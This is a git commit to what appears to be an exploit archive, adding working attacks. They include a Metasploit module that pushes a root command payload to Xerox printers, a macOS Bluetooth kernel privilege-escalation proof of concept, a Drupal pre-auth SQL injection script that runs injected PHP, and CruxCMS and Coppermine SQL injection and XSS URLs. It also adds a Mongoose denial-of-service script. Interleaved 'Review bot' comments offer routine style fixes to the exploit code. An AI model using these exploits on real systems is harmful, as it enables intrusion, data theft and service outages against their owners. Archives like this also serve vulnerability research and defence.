Updated 11_05_2014
This commit is contained in:
parent
79ad0e1a38
commit
9fc5498a7e
9 changed files with 346 additions and 0 deletions
|
@ -31660,3 +31660,11 @@ id,file,description,date,author,platform,type,port
|
|||
35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
|
||||
35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
|
||||
35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0
|
||||
35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
|
||||
35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) ""Patch"" DLM Vulnerability",2014-11-03,metasploit,hardware,remote,9100
|
||||
35153,platforms/osx/dos/35153.c,"Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0
|
||||
35154,platforms/asp/webapps/35154.txt,"Sigma Portal 'ShowObjectPicture.aspx' Denial of Service Vulnerability",2010-12-27,"Pouya Daneshmand",asp,webapps,0
|
||||
35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0
|
||||
35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0
|
||||
35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0
|
||||
35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0
|
||||
|
|
|
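--- a/platforms/asp/webapps/35154.txt
+++ b/platforms/asp/webapps/35154.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45588/info
+
+Sigma Portal is prone to a denial-of-service vulnerability.
+
+Attackers can exploit this issue to cause the server to consume excessive resources, denying service to legitimate users.
+
+http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)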
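--- a/platforms/hardware/remote/35151.rb
+++ b/platforms/hardware/remote/35151.rb
@@ -0,0 +1,98 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+Rank = GoodRanking
+include Msf::Exploit::Remote::Tcp
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability',
+'Description' => %{
+This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By
+supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary
+commands under root priviages.
+},
+'Author' =>
+[
+'Deral "Percentx" Heiland',
+'Pete "Bokojan" Arzamendi'
+],
+'References' =>
+[
+['BID', '52483'],
+['URL', 'http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf'],
+['URL', 'http://foofus.net/goons/percx/Xerox_hack.pdf']
+],
+'Privileged' => true,
+'License' => MSF_LICENSE,
+'Payload' =>
+{
+'DisableNops' => true,
+'Space' => 512,
+'Compat' =>
+{
+'PayloadType' => 'cmd cmd_bash',
+'RequiredCmd' => 'generic bash-tcp'
+}
+},
+'Platform' => ['unix'],
+'Arch' => ARCH_CMD,
+'Targets' => [['Automatic', {}]],
+'DisclosureDate' => 'Mar 07 2012',
+'DefaultTarget' => 0))
+
+register_options(
+[
+Opt::RPORT(9100)
+], self.class)
+end
+
+def exploit
+print_status("#{rhost}:#{rport} - Sending print job...")
+firmcode = '%%XRXbegin' + "\x0A"
+firmcode << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A"
+firmcode << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A"
+firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{payload.encoded}" + ':"' + "\x0A"
+firmcode << '%%OID_ATT_JOB_COMMENT "patch"' + "\x0A"
+firmcode << '%%OID_ATT_DLM_NAME "xerox"' + "\x0A"
+firmcode << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "\x0A"
+firmcode << '%%OID_ATT_DLM_SIGNATURE "ca361047da56db9dd81fee6a23ff875facc3df0e1153d325c2d217c0e75f861b"' + "\x0A"
+firmcode << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "\x0A"
+firmcode << '%%XRXend' + "\x0A\x1F\x8B\x08\x00\xB1\x8B\x49\x54\x00\x03\xED"
+firmcode << "\xD3\x41\x4B\xC3\x30\x14\x07\xF0\x9E\xFB\x29\xFE\xE2\x60\x20\x74"
+firmcode << "\x69\x63\x37\x61\x5A\xBC\x79\x94\xDD\x3C\xC8\xA0\x59\x9B\xDA\x4A"
+firmcode << "\xD7\xCC\xB4\xD3\x1D\xF6\xE1\x8D\xDD\x64\xB8\x83\x3B\x0D\x11\xFE"
+firmcode << "\xBF\x43\x03\xAF\x2F\xEF\xBD\xB4\x64\xA3\xAD\xD9\x8C\xDA\xD2\x3B"
+firmcode << "\xA3\xD0\xB9\x19\x8F\xFB\xD5\x39\x5E\xC3\x58\x4E\xBC\x48\xC6\x52"
+firmcode << "\x5E\x87\xE3\x89\x8C\xBD\x30\x8A\xE4\x44\x7A\x08\xCF\x39\xD4\xB7"
+firmcode << "\x75\xDB\x29\x0B\x78\xD6\x98\xEE\xB7\xBC\x53\xEF\xFF\xA9\xCB\x0B"
+firmcode << "\xB1\xA8\x1A\xB1\x50\x6D\xE9\x17\x55\x9D\xA4\x2F\x56\xAF\x10\xD4"
+firmcode << "\x08\x1E\x30\x9C\x59\xA5\x73\x35\x7B\x7A\x94\x61\x14\x0F\x21\xDE"
+firmcode << "\x95\x15\xED\xCA\x98\x5A\x34\x99\x68\x74\x27\x5E\xCD\x62\x7A\x35"
+firmcode << "\x8A\x52\xBF\x2A\xF0\x8C\xA0\xC0\xC0\xD5\xC0\xDC\xEF\x4A\xDD\xF8"
+firmcode << "\xC0\x47\x59\xD5\x1A\x56\xAB\x1C\x75\xD5\x68\x17\xC9\x8D\x7B\x00"
+firmcode << "\x3A\x2B\x0D\x06\x5F\x31\x6C\xB1\xEB\xF8\x06\xFC\x68\xD7\xE7\xF5"
+firmcode << "\x65\x07\xF7\x48\x12\x84\x98\xDF\x62\x5F\x17\xC8\xCC\x72\xA9\x9A"
+firmcode << "\x3C\x49\x0F\x95\xB6\xD9\xBA\x43\x90\x4F\xDD\x18\x32\xED\x93\x8A"
+firmcode << "\xAA\xEF\xE8\x9A\xDC\xF5\x83\xF9\xBB\xE4\xFD\xDE\xED\xE1\xE0\x76"
+firmcode << "\x89\x91\xD8\xEC\x6F\x82\xFB\x0C\xFE\x5F\xFF\x15\x22\x22\x22\x22"
+firmcode << "\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\xA2\xD3\x3E"
+firmcode << "\x01\x5A\x18\x54\xBB\x00\x28\x00\x00"
+
+begin
+connect
+sock.put(firmcode)
+handler
+rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse => e
+print_error("#{rhost}:#{rport} - #{e.message}")
+ensure
+disconnect
+end
+end
+end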
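Review bot: The description block in initialize misspells "privileges" as "priviages" (`commands under root priviages.`); this text is what users see in the module info, so it should read `commands under root privileges.`. In exploit, `"#{payload.encoded}"` wraps a value that is already a string in an interpolation and can simply be `payload.encoded`. The rescue clause in exploit lists `Rex::ConnectionRefused`, `Rex::HostUnreachable` and `Rex::ConnectionTimeout` next to `Rex::ConnectionError`; if those are subclasses of it, as they appear to be in Rex, the three extra entries are redundant and the list can be trimmed to `::Timeout::Error, Rex::ConnectionError, Rex::AddressInUse`. The ten `'%%...' + "\x0A"` header lines would read more clearly as one heredoc or an array joined with "\n", leaving only the binary tail as byte literals.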
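--- a/platforms/osx/dos/35153.c
+++ b/platforms/osx/dos/35153.c
@@ -0,0 +1,92 @@
+/*
+* pwn.c, by @rpaleari and @joystick
+*
+* This PoC exploits a missing sign check in
+* IOBluetoothHCIUserClient::SimpleDispatchWL().
+*
+* Tested on Mac OS X Mavericks (10.9.4/10.9.5).
+*
+* Compile with: gcc -Wall -o pwn{,.c} -framework IOKit
+*
+*/
+
+#include <stdio.h>
+#include <string.h>
+#include <mach/mach.h>
+#include <mach/vm_map.h>
+
+#include <IOKit/IOKitLib.h>
+
+uint64_t payload() {
+/* Your payload goes here. */
+}
+
+int main(void) {
+/* Map our landing page (kernel will jump at tgt+7) */
+vm_address_t tgt = 0x0000048800000000;
+vm_allocate(mach_task_self(), &tgt, 0x1000, 0);
+vm_protect(mach_task_self(), tgt, 0x1000, 0,
+VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE);
+memset((void *)tgt, 0, 0x1000);
+
+/* Prepare payload */
+char *target = (char *)tgt;
+
+/* mov rax, payload */
+target[7] = 0x48;
+target[8] = 0xb8;
+*((uint64_t *)(&target[9])) = (uint64_t) payload;
+
+/* jmp rax */
+target[17] = 0xff;
+target[18] = 0xe0;
+
+printf(" [+] Payload function @ %016llx\n", (uint64_t) payload);
+printf(" [+] Stored trampoline @ %016llx\n", (uint64_t) tgt+7);
+
+/* Find the vulnerable service */
+io_service_t service =
+IOServiceGetMatchingService(kIOMasterPortDefault,
+IOServiceMatching("IOBluetoothHCIController"));
+
+if (!service) {
+return -1;
+}
+
+/* Connect to the vulnerable service */
+io_connect_t port = (io_connect_t) 0;
+kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
+IOObjectRelease(service);
+if (kr != kIOReturnSuccess) {
+return kr;
+}
+
+printf(" [+] Opened connection to service on port: %d\n", port);
+
+/* The first 8 bytes must be 0, so we don't have to handle following
+parameters */
+char a[] = "\x00\x00\x00\x00\x00\x00\x00\x00"
+/* Don't really matter for the exploit (ignored due to the 0s above) */
+"\x00\x00\x00\x00\x00\x00\x00\x07\x02\x00\x00\x00\x11\x0a\x00\x00\x03\x72\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xfa\x2a\x54\xff\x7f\x00\x00\x78\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\xa8\xfb\x2a\x54\xff\x7f\x00\x00\xd8\xfa\x2a\x54\xff\x7f\x00\x00\x60\x4a\xb6\x86"
+"\x80\xff\xff\xff"
+/* Index value 0xfff5b6a8 makes _sRoutines[index] point to an in-kernel
+memory area that contains {0x0000048800000007, N}, with 0 <= N < 8. May
+need to be adjusted on other Mavericks versions. */
+"\xa8\xb6\xf5\xff\x80\xff\xff\xff";
+
+printf(" [+] Launching exploit!\n");
+kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
+(uint32_t) 0, /* Selector */
+NULL, 0, /* input, inputCnt */
+(const void*) a, /* inputStruct */
+sizeof(a), /* inputStructCnt */
+NULL, NULL, NULL, NULL); /* Output stuff */
+
+/* Exec shell here after payload returns */
+
+return IOServiceClose(port);
+}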
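Review bot: `payload()` is declared to return `uint64_t` but its body has no return statement, so the `gcc -Wall` build named in the header warns that control reaches the end of a non-void function and the value is undefined; the stub should either `return 0;` or the comment should say that the body is deliberately left to the reader. The `printf` that prints `port` uses `%d` for an `io_connect_t`, which is an unsigned Mach port name, so `%u` is the matching specifier. `(uint64_t) tgt+7` depends on the cast binding tighter than `+`; it is correct, but `(uint64_t) tgt + 7` with spaces, or `(uint64_t) (tgt + 7)`, reads as intended. The `vm_allocate` and `vm_protect` return values are discarded, which `-Wall` does not flag; a short comment saying the PoC assumes they succeed would make that assumption explicit.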
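--- a/platforms/php/webapps/35150.php
+++ b/platforms/php/webapps/35150.php
@@ -0,0 +1,86 @@
+<?php
+// _____ __ __ _ _______
+// / ___/___ / /__/ /_(_)___ ____ / ____(_)___ _____
+// \__ \/ _ \/ //_/ __/ / __ \/ __ \/ __/ / / __ \/ ___/
+// ___/ / __/ ,< / /_/ / /_/ / / / / /___/ / / / (__ )
+// /____/\___/_/|_|\__/_/\____/_/ /_/_____/_/_/ /_/____/
+// Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins
+//
+// created by Stefan Horst <stefan.horst@sektioneins.de>
+// and Stefan Esser <stefan.esser@sektioneins.de>
+//·
+
+include 'common.inc';
+include 'password.inc';
+
+// set values
+$user_id = 0;
+$user_name = '';
+
+$code_inject = 'phpinfo();session_destroy();die("");';
+
+$url = isset($argv[1])?$argv[1]:'';
+$code = isset($argv[2])?$argv[2]:'';
+
+if ($url == '-h') {
+echo "usage:\n";
+echo $argv[0].' $url [$code|$file]'."\n";
+die();
+}
+
+if (empty($url) || strpos($url,'https') === False) {
+echo "please state the cookie url. It works only with https urls.\n";
+die();
+}
+
+if (!empty($code)) {
+if (is_file($code)) {
+$code_inject = str_replace('<'.'?','',str_replace('<'.'?php','',str_replace('?'.'>','',file_get_contents($code))));
+} else {
+$code_inject = $code;
+}
+}
+
+$code_inject = rtrim($code_inject,';');
+$code_inject .= ';session_destroy();die("");';
+
+if (strpos($url, 'www.') === 0) {
+$url = substr($url, 4);
+}
+
+$_SESSION= array('a'=>'eval(base64_decode("'.base64_encode($code_inject).'"))','build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');
+$_SESSION['build_info']['args'][0] = &$_SESSION['string'];
+
+list( , $session_name) = explode('://', $url, 2);
+
+// use insecure cookie with sql inj.
+$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
+$password = user_hash_password('test');
+
+$session_id = drupal_random_key();
+$sec_ssid = drupal_random_key();
+
+$serial = str_replace('}','CURLYCLOSE',str_replace('{','CURLYOPEN',"batch_form_state|".serialize($_SESSION)));
+$inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,REPLACE(REPLACE('".$serial."','CURLYCLOSE',CHAR(".ord('}').")),'CURLYOPEN',CHAR(".ord('{').")) -- ";
+
+$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;
+
+$ch = curl_init($url);
+
+curl_setopt($ch,CURLOPT_HEADER,True);
+curl_setopt($ch,CURLOPT_RETURNTRANSFER,True);
+curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);
+curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
+
+curl_setopt($ch,CURLOPT_HTTPHEADER,array(
+'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+'Accept-Language: en-US,en;q=0.5'
+));
+
+curl_setopt($ch,CURLOPT_COOKIE,$cookie);
+
+$output = curl_exec($ch);
+
+curl_close($ch);
+
+echo $output;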
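Review bot: The scheme check `strpos($url,'https') === False` accepts any URL that contains the substring "https" anywhere, not only an https:// URL, so an http:// URL with "https" in its path passes the guard while the error message promises otherwise; `strpos($url, 'https://') !== 0` states the intended condition. `include 'common.inc'` and `include 'password.inc'` resolve against PHP's include path, presumably Drupal's own includes/ directory given the `user_hash_password` and `drupal_random_key` calls, but nothing in the file says where it must be run from; a header comment such as `// run from a Drupal 7 checkout's includes/ directory so common.inc and password.inc resolve` would spare the next reader a fatal error. `CURLOPT_SSL_VERIFYPEER` is switched off without explanation; a one-line comment that this is deliberate for self-signed test instances would document the choice rather than leave it looking accidental.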
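--- a/platforms/php/webapps/35155.txt
+++ b/platforms/php/webapps/35155.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/45594/info
+
+CruxCMS is prone to multiple input-validation vulnerabilities, including multiple security-bypass issues, multiple arbitrary-file-upload issues, multiple SQL-injection issues, a local file-include issue, a cross-site-scripting issue and multiple information-disclosure issues. These issues occur because the application fails to properly sanitize user-supplied input.
+
+Exploiting these issues may allow an unauthorized user to view files and execute local scripts, execute arbitrary script code, bypass certain security restrictions, access or modify data, exploit latent vulnerabilities in the underlying database, gain administrative access, steal cookie-based authentication credentials, and launch other attacks.
+
+CruxCMS 3.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cruxcms.3.0.0/search.php?search=_&max=1+UNION+ALL+SELECT+1,CONCAT_WS(0x3a,Id,Name,Password,Email,Admin),1,1+FROM+cruxcms_users
+http://www.example.com/cruxcms.3.0.0/links.php?max=1+UNION+ALL+SELECT+1,1,CONCAT_WS(0x3a,Id,Name,Password,Email,Admin),1,0x596573+FROM+cruxcms_users
+http://www.example.com/cruxcms.3.0.0/includes/template.php?style=../white.gif
+http://www.example.com/cruxcms.3.0.0/manager/login.php?message=<script>alert(123);</script>
+http://www.example.com/cruxcms.3.0.0/manager/switcher.php?style[]
+http://www.example.com/cruxcms.3.0.0/search.php?search[]
+http://www.example.com/cruxcms.3.0.0/manager/filetypes.php
+http://www.example.com/cruxcms.3.0.0/styles/andreas01.php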
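--- a/platforms/php/webapps/35156.txt
+++ b/platforms/php/webapps/35156.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/45600/info
+
+Coppermine Photo Gallery is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Coppermine Photo Gallery 1.5.10 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cpg.1.5.10/help.php?base=1
+&h=czozMzoiPHNjcmlwdD5hbGVydCgnaGVhZGVyJyk7PC9zY3JpcHQ%2bIjs
+&t=czozMToiPHNjcmlwdD5hbGVydCgndGV4dCcpOzwvc2NyaXB0PiI7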
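--- a/platforms/php/webapps/35157.html
+++ b/platforms/php/webapps/35157.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45600/info
+
+Coppermine Photo Gallery is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Coppermine Photo Gallery 1.5.10 is vulnerable; other versions may also be affected.
+
+<html><body><center> <form action="http://localhost/cpg.1.5.10/searchnew.php" method="post"> <input type="hidden" name="insert" value="1"> <input type="hidden" name="pics[]" value="222"> <input type="hidden" name="picfile_222" value="PGJvZHkgb25sb2FkPWFsZXJ0KDEyMyk7Pg"> <input type="submit" value="Test!"> </form> </center></body></html>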
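--- a/platforms/windows/dos/35158.py
+++ b/platforms/windows/dos/35158.py
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/45602/info
+
+Mongoose is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted input.
+
+Successfully exploiting this issue will allow an attacker to crash the affected application, denying further service to legitimate users.
+
+Mongoose 2.11 is vulnerable; other versions may also be affected.
+
+import socket
+
+host = 'localhost'
+port = 8080
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.settimeout(8)
+s.connect((host, port))
+s.send('GET / HTTP/1.1\r\n'
+'Host: ' + host + '\r\n'
+'Content-Length: -2147483648\r\n\r\n')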
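Review bot: The socket created with `socket.socket(...)` is never closed and no response is read, so the descriptor is only released at interpreter exit; wrapping the connect/send in `try: ... finally: s.close()` releases it even when `s.connect((host, port))` raises against the hard-coded `localhost:8080`. The request is passed to `s.send` as a `str`, which only works on Python 2; a `#!/usr/bin/env python2` shebang or a comment naming the interpreter would spare the next reader a `TypeError` on Python 3. The advisory prose above `import socket` is not valid Python, so the file as committed cannot be run directly; a comment noting that the script starts at the `import` line would make that clear.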